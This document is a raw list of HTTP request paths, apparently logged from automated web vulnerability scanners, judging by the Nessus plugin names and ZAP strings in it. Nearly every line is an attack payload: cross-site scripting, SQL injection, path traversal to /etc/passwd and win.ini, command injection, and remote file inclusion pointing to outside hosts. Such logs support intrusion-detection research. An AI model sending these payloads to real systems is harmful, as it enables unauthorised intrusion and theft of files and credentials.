src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/500page.jsp\n/qb2xy9aw.pl?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/../phpmyadmin.sql\n/help.php?q=\"|ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/instructionsearch_description/\n/scripts/shop.plx/page=nessus1300331803\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/colors/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/examples/jsp/cal/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/javascript/copyright.exe\n/bin/texis.exe/junk\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null --\n/cacti/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/zz5thkvtmlgl?\n/uvazfs7p.html?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/y8pmygrp.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/matrixssl/\n/iisscanscript/\n/xsqln7eb.do?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/main.php?logout=&ver\\x0c>q16537712&rem\\x0c\n/cgi/vssetcookie.exe\n/javascript/weather.exe\n/cacti/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/ap58k3ci.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/hipkz026.cfc?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/b16_sos children's support worker/\n/iissamples/issamples/fastq.idq?citemplate=../../../../../../../../../../winnt/win.ini\n/en-us/<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/scripts/weblog\n/main.php?logout=\"ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/ydexw8by.cfc?<script>document.cookie=\"testulex=4996;\"</script>\n<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/1qwv2p5p.pl?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/d44uk9h2.kspx?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/admin/operators.php?projectissueid=\"><script>alert(412615577805)</script><\"\n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/ghl9il?\n/login.asp?ret_page=a\"><script>alert('wvs-xss-magic-string-413145588079')</script><\"\n/main.php?stuff=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/examples/jsp/sessions/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/scripts/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/j4drbkil.asp?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&ver\\xa0>q39243847&rem\\xa0\n/copatranscript_20061031/\n/examples/servlets/servlet/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/javascript/frame.exe\n/cgi-bin/add_url.htm?node=<script>alert('xss')</script>\n/examples/jsp/colors/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/top.php?stuff=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/en-us/<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/examples/jsp/jsp2/el/faq.php?action=&type=view&s=&id=-1' union select 0,963542110,0,0,0,0,0--\n/cgi-local/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/6dlc2zm9.pl?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/javascript/admin-console.exe\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332009304')</script>\n/cms/revert-content.php?type=newest&id=1\" union all select null,null,11221133,null,null/*\n/admin/index.php?path_to_script=http://192.168.202.96:8080/no4ghqiguzhst??&cmd=ls\n/ht8pn8uq.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/edzaia0i.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ybz5rz7a.cfc?<script>document.cookie=\"testsbvw=6289;\"</script>\n/examples/jsp/checkbox/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/javascript/.passwd.bat\n/recordings/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/nethome.exe\n/help.php?section='qualiteam_xcart_sql_xss.nasl\n/javascript/servlets.exe\n/eg2u8pbv.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/confirmunsubscription.php?output=http://192.168.202.96:8080/no4ghqiguzhst?\n/stdrun13.exe/\n/ju0u7kfo.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/main.php?logout='\\x0duname\\x09>q39919215\\x09#\n/let's ride/\n/scripts/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/cacti/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/sys/code/box.inc.php?config[\\\"sipssys\\\"]=@rfiurl\n/cacti/search.php?submit=true&search=');\n/examples/jsp/jsp2/jspx/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/cal/index.php?templates_dir=/etc/passwd\\x00\n/recordings/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/0u75ldxq.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7uz3ok60.idc?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"rm q82754698 #\n/examples/jsp/sessions/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/9o6g5vkn.jsp?<script>cross_site_scripting.nasl</script>\n/javascript/.htaccess.sfish/'`false`'\n/top.php?stuff='\\x0adel q53951968 #\n/help.php?q=\\x0auname\\x09>q34532953\\x09#\n/d5a5renl.exe?<script>cross_site_scripting.nasl</script>\n/javascript/docs.exe\n/scripts/1hactwocbsuo.pl\n/search.jsp?q=%\"<script>alert(1331904190)</script>\n/top.php?stuff=\"&ver\\xa0>q83547895&rem\\xa0\n/main.php?logout=;uname #\n/main.php?stuff=\"&sleep\\x0910\\x09#\n/cacti/remindpasswd\n/u8yiqilu.exe?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/i686v90l.cfm?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/cgi.cgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1077905216,0,0,0,0,0--\n/yef5f3d5.do?<script>document.cookie=\"testcrcv=6167;\"</script>\n/phpmyadmin/ftp/ftp.pl?dir=../../../../../../etc\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=id\n/examples/jsp/checkbox/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/examples/jsp/jsp2/jspx/shopexd.asp?catalogid='42\n/top.php?stuff=\"ping -w 10000 -n 1 1.2.3.4&rem \n/main.php?stuff=&rm;q41243131&rem;\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://cirt.net/rfiinc.txt?\n/index.php?id='union/**/select/**/0,0,617137594,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/ghl9il??\n/8x6w469u.htm?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/phpmyadmin//../../../../../../../../etc/passwd\n/scripts/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/top.php?stuff=';uname\\x09>q48683432\\x09#\n/scripts/rvckwz6smkqf.php3\n/cgi-bin/styles.php?toroot=/etc/passwd\\x00\n/0w155a7c.cgi?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=\\x0acat /etc/passwd\n/cgi/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/zln2hm2z.jsp?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/awstats/awstats.pl?migrate=|echo;/./tmp/ptsrmtfadl.sh;echo|awstats625810.txt\n/b5xdqgz2.php3?<script>cross_site_scripting.nasl</script>\n/search/submit.php?config[\"sipssys\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/quagynka.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ida_scripts/\n/recordings/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/t3af3tdz.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/egaet53a.jsp?<script>cross_site_scripting.nasl</script>\n/m2fpztty.fts?<script>cross_site_scripting.nasl</script>\n/ao22ww7y.do?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/7dbjwpw6.cgi?<script>cross_site_scripting.nasl</script>\n/fcgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/lom_update.php?etcdir=@rfiurl\n/examples/jsp/colorssearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/help.php?q=';sleep 7 #\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.old\n/main.php?stuff='\\x0auname >q85424597 #\n/ap58k3ci.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zroo33l4.do?<script>document.cookie=\"testiklc=904;\"</script>\n/main.php?stuff='\\x0arm\\x09q47233887\\x09#\n/top.php?stuff=\"del q51291193&rem \n/cgi-perl/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/d44uk9h2.php3?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/servlets/servlet/snpfiltered.pl?t=c&u=<script>foo</script>\n/examples/jsp/colors/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/scripts/index.php?edit=nonexistant1438827371\n/fc9t54l7.html?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/j4rdyhw8.htm?<script>document.cookie=\"testrluj=1420;\"</script>\n/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/top.php?stuff=\"|ping,-w,10000,-n,1,1.2.3.4|rem,\n/help.php?q=\"\\x0asleep 7 #\n/en-us/account/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/search.php?search_phrase=\\\"><script> alert (413405588095) </script><;\"&search=search\n/javascript/failure.exe\n/cacti/index.cfm?fuseaction=category.display&category_id='\n/bmeun223.cgi?<script>document.cookie=\"testhhwu=7044;\"</script>\n/o1zj4u9v.htm?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/cacti/top.php?header=../../../../../../../../etc/passwd\n/help.php?q=del;q25171792&rem;\n/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/buyhydrocodonenoprescription/\n/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('vulnerable')</script>\n/phpmyadmin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/javascript/flv.exe\n/scripts/zpanel.php?page=/etc/passwd\\x00\n/scripts/tools/getdrvrs.exe\n/top.php?stuff=\"rm q95826835 #\n/scripts/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/recordings/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/scripts/lrn28issfuqi.shtml\n/jackrabbit/search.jsp?q=%\"<script>alert(1331904660)</script>\n/8x6w469u.cfm?<script>document.cookie=\"testgfjr=1286;\"</script>\n/amarok-scripts/\n/help.php?q=\"&del\\x0cq33739327&rem\\x0c\n/webcgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/scripts/search.jsp?q=%\"<script>alert(1331909171)</script>\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331908741,4--&blog=1\n/scripts/cdjnwtwnqga1.asp\n/women's_health/\n/newkprosubscription/\n/ybz5rz7a.aspx?<script>document.cookie=\"testsbvw=6289;\"</script>\n/xlj7h65o.php3?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/jujgxwav.jsp?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/_vti_bin/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/top.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/m5103snj.exe?<script>cross_site_scripting.nasl</script>\n/m5103snj.php3?<script>cross_site_scripting.nasl</script>\n/javascript/restricted.exe\n/examples/servlets/servlet/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/esmozg5d.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/help.php?q=\"&rm\\x0bq16289629&rem\\x0b\n/javascript/open.exe\n/cgi-bin/db2www/library/document.d2w/show\n/cgi-perl/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/scs86g1p.exe?<script>document.cookie=\"testquyx=2820;\"</script>\n/d7ktpmcq.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd\n/zv8tv7h8.idc?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/8t9v8k7x.fts?<script>document.cookie=\"testhvje=9403;\"</script>\n/javascript/pbo.exe\n/scripts/showproduct.php?product=1'\n/help.php?q=\";rm\\x09q65733963\\x09#\n/main.php?stuff=\"|ping,-w,8000,-n,1,4.3.2.1|rem,\n/j734qobz.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/add_url.htm?node=<script>alert('xss')</script>\n/phpmyadmin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/cialis-prescriptions/\n/maillistsubscription/\n/esmozg5d.pl?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"|ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/descriptions_published/\n/javascript/mods.exe\n/javascript/lost.exe\n/d44uk9h2.pl?<script>document.cookie=\"testmybc=2088;\"</script>\n/<script>cross_site_scripting.nasl</script>.do\n/jdx255ea.jsp?<script>document.cookie=\"testziyq=5055;\"</script>\n/en-us/n9xlumt5.jsp?<script>cross_site_scripting.nasl</script>\n/scripts/nmap.php?target=|ipconfig /all\n/0qhcnefz.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ht8pn8uq.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/help.php?q=\"\\x0ddel\\x09q93881688\\x09#\n/main.php?stuff=\"ping;-w;8000;-n;1;4.3.2.1|rem;\n/action.php/\"><script>alert(413766083531)</script>\n/iktok2bw.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uvazfs7p.htm?<script>document.cookie=\"testwtbo=4831;\"</script>\n/um7xpn15.do?<script>document.cookie=\"testotoy=6142;\"</script>\n/examples/jsp/num/top.php?header=../../../../../../../../etc/passwd\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>\" and \"1\"=\"1\n/longdescriptionfeed/\n/a0imiuf1.x?<script>document.cookie=\"testxqrn=4654;\"</script>\n/top.php?stuff=\"ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/help.php?q=ver\\x09>q56341131&rem\\x09\n/cgi-bin/index.php?op=default&date=200607' union select 1,1576609633,1,1,1,1,1,1,1,1--&blogid=1\n/index.php?query=<script>alert(411946083450)</script>&type=advanced&results=20&searchtype=2\n/main.php?stuff=\"|ping;-w;11000;-n;1;1.2.3.4|rem;\n/javascript/bloggers.exe\n/main.php?stuff=\"ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/main.php?frm_daynight=q35298715&frm_passwd=&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=\n/en-us/33y9gcqq.cfm?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/examples/jsp/colors/index.php?id='union/**/select/**/0,0,2034425430,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cgi-bin/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/..\\xc0\\xaf/admin/config.php\n/examples/jsp/error/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/0rufe52p.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/alert.exe\n/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>\n/examples/jsp/colors/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/nfs.exe\n/search?ns-query-pat=../../../../../../../../../../etc/passwd\n/main.php?stuff=\"ping -w 7000 -n 1 1.2.3.4|rem \n/nmw0do67.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/e9rx3ya4.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/gbpass.pl\n/javascript/robot.exe\n/dda2qr7j.mscgi?<script>cross_site_scripting.nasl</script>\n/_mem_bin/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?logout=\"&del\\x0bq42433487&rem\\x0b\n/formmail_script/\n/en-us/oie504mr.nsf?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/6n7aacgg.jsp?<script>cross_site_scripting.nasl</script>\n/ddoworrl.cfm?<script>document.cookie=\"testvlau=8517;\"</script>\n/cacti/index.php?p='nessus\n/examples/jsp/jsp2/jspx/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/scripts/2pwudii1mt22.pl\n/dslpwt15.jspa?<script>document.cookie=\"testtkio=5454;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../etc/passwd\n/scripts/prnnucptkixl.asp\n/ao22ww7y.cfm?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/d765w06j.pl?<script>cross_site_scripting.nasl</script>\n/jnv890lt.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jujgxwav.aspx?<script>document.cookie=\"testknim=9383;\"</script>\n/en-us/account/smpwservicescgi.exe\n/weq93ppb.cfm?<script>cross_site_scripting.nasl</script>\n/manager/webadmin.php?show=/etc/passwd\n/clk;33749358;7163019;q/\n/cgi-bin/index.php?id='\n/main.php?logout=ver\\xa0>q87867783&rem\\xa0\n/javascript/jre.exe\n/examples/jsp/colors/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/apavxugx.cfm?<script>document.cookie=\"testdnbh=5237;\"</script>\n/en-us/account/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/scripts/4rzefq7dsowk.php\n/javascript/test.exe\n/main.php?logout='\\x0ddel\\x09q37443231\\x09#\n/cgi-bin/forums.asp?ifor=duforum_sql_injections.nasl'\n/cgi-bin/index.php?id='union/**/select/**/0,0,768662659,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/6n7aacgg.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/shopper.cgi?newpage=../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/story.pl?next=../../../../../etc/passwd\\x00\n/eei78ore.x?<script>cross_site_scripting.nasl</script>\n//q99252119&#x26;q8892&#x22;q8892&#x3c;q8892&#x3e;q99252119\n/en-us/33y9gcqq.idc?<script>document.cookie=\"testnvxc=4301;\"</script>\n/e9rx3ya4.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/htbin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/ghl9il?\n/cgi-bin/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/main.php?stuff=\"ver >q82735586&rem \n/fnwhrxyd.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ollyscript-project/\n/9kr0ih0v.php?<script>document.cookie=\"testzgnm=1183;\"</script>\n/javascript/51.exe\n/examples/jsp/colors/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/purchaseprintsubscription/\n/javascript/change.exe\n/d7ktpmcq.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/backup/add-passwd.cgi\n/main.php?stuff=\";uname >q62299957 #\n/en-us/w4996nr0.x?<script>document.cookie=\"testttvs=7163;\"</script>\n/csconm/servlet/login/login.jsp?url=csconm/servlet/com.cisco.core.mice.main?command=</script><script>alert(document.cookie)</script>\n/webtools/bonsai/cvsblame.cgi?file=<script>alert('vulnerable')</script>\n/g8nu2yy7.nsf?<script>cross_site_scripting.nasl</script>\n/script/tick/test.php?path_to_code=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/javascript/func.exe\n/igtf0zon.cfc?<script>cross_site_scripting.nasl</script>\n/jdx255ea.exe?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/606wkcop.mscgi?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&del\\x09q44432678\\x09#\n/v3axg1p8.asp?<script>document.cookie=\"testxagh=6987;\"</script>\n/javascript/general.exe\n/recordings/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/scripts/index.php?file=news&op=phpinfo\n/r3le3om5.do?<script>cross_site_scripting.nasl</script>\n/0z575z74.x?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/31873-hezbolla's global reach/\n/examples/jsp/num/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/en-us/account/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/dslpwt15.x?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/\">general</\n/examples/servlets/servlet/cart32.exe\n/manager/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/\"8964\"/\n/scriptpath/index.php?page=http://192.168.202.96:8080/txenjrxf3?\n/phpmyadmin/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/en-us/account/core/api.php?t_path_core=/etc/passwd\\x00\n/cgi-bin/index.php?src=1&_common=1&time=1332008335&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/renewsubscription/\n/examples/jsp/jsp2/el/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/1r8cfrlf.cfm?<script>document.cookie=\"testydan=5106;\"</script>\n/fo564rei.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnv890lt.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/_vti_txt.exe\n/examples/servlets/servlet/index.php?post=../config/password\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=b49qub_3fcej28fx9\n/d5a5renl.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?action=login&module=users\n/fcgi-bin/vssetcookie.exe\n/cgi-bin/index.php?id=9_8hm4y9d6'\n/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/admin/top.php?admindir=/etc/passwd\\x00\n/examples/jsp/num/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/scripts/irbf6nj7oyfh.shtml\n/bn857frh.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/quagynka.fts?<script>cross_site_scripting.nasl</script>\n/javascript/sold.exe\n/cgi-bin/search.jsp?q=%\"<script>alert(1332008323)</script>\n/top.php?stuff=&ping;-w;7000;-n;1;1.2.3.4&rem;\n/manager/index.php?act=arcade&do=stats&gameid=1'\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../vtigerservice.php\\x00\n/forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1\n/main.php?stuff='del\\x09q85612241\\x09#\n/1qwv2p5p.mscgi?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/javascript/_js.exe\n/cacti/index.php?id=_pb9wansu9'\n/passwd.adjunct\n/ghswfouu.asp?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/main.php?logout=\"\\x0asleep 9 #\n/javascript/11.exe\n/1qwv2p5p.cfm?<script>document.cookie=\"testvqcy=252;\"</script>\n/manager/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/scripts/udblphlq4nln.php3\n/recordings/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/dda2qr7j.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/raanw4ia.cfc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?module=<script>foo</script>\n/scripture/\n/aj3pf49c.asp?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/v3axg1p8.cfc?<script>document.cookie=\"testxagh=6987;\"</script>\n/scripts/eezuu7xc7ge3.asp\n/scripts/qcvjnagy16kc.shtml\n/help.php?q=';sleep 9 #\n/9kr0ih0v.php?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat /etc/passwd|\n/33y9gcqq.mscgi?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/p043snfr.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nuh3zirz.jspa?<script>cross_site_scripting.nasl</script>\n/en-us/h5sc3gxy.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/language.php?data_dir=/etc/passwd\\x00\n/zqqemp6j.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgis/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/jscript7/\n/javascript/tn.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+0c+20+ae+75+e9+e2+f7+8b+73+18+8d+45+0d+50+6a+0e+e8+18+00+00+00+50+8d+45+1b++>>ctdn\n/examples/jsp/error/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/recordings/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/top.php?stuff=&ver\\xa0>q89228348&rem\\xa0\n/main.php?stuff=\"del\\x0bq27764952&rem\\x0b\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/txenjrxf3?\n/examples/jsp/error/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/l752x1ry.php3?<script>cross_site_scripting.nasl</script>\n/cgi-914/testcgi.exe\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/scripts/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/messaging.exe\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/m2fpztty.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o35zot2r.jspa?<script>cross_site_scripting.nasl</script>\n/azcrfs8d.jspa?<script>document.cookie=\"testjpdr=9205;\"</script>\n/cgi-bin/tst.bat|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,\n/top.php?stuff=\"del\\x09q89765477\\x09#\n/h4bi26jd.htm?<script>document.cookie=\"testhrzx=1150;\"</script>\n/i686v90l.mscgi?<script>document.cookie=\"testfutf=1550;\"</script>\n/msdnsubscriptions/\n/help.php?q=\"rm\\x0bq54818771&rem\\x0b\n/examples/jsp/colors/myevent.php?myevent_path=/etc/passwd\\x00\n/main.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/esp?page=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/scripts/nph-exploitscanget.cgi?host=`id`&port=3128&errchk=0&idsbypass=0\n/examples/jsp/checkbox/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/nmw0do67.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie 